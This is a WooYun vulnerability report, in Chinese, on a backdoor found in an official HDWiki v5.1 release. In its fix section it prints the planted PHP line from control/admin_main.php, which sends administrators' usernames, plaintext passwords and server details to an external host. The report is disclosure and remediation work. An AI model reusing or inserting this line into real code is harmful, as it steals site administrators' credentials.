当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06877

漏洞标题:互动百科WIKI某版本被植入窃取帐号密码的后门

相关厂商:互动百科

漏洞作者: BugFix

提交时间:2012-05-09 20:54

修复时间:2012-05-09 20:54

公开时间:2012-05-09 20:54

漏洞类型:内容安全

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

互动百科WIKI系统特定版本中被恶意置入了后门,用于收集管理员帐号、密码、服务器地址等信息。

详细说明:

从官方网站下载的互动百科v5.1 20110927版本文件包中的control/admin_main.php文件被恶意植入后门代码,这段后门代码可以讲管理员的登录帐号、密码、服务器地址等信息发送到一个恶意站点(目前该恶意站点已经无法访问)上,导致网站的私密信息泄露。

漏洞证明:

修复方案:

删除control/admin_main.php文件中第66行的代码,代码如下:

@file_get_contents('http://kk.oodnf.com/hdwiki/wk.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);


或下载新版本,新版本漏洞已经修复:

版权声明:转载请注明来源 BugFix@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:12 (WooYun评价)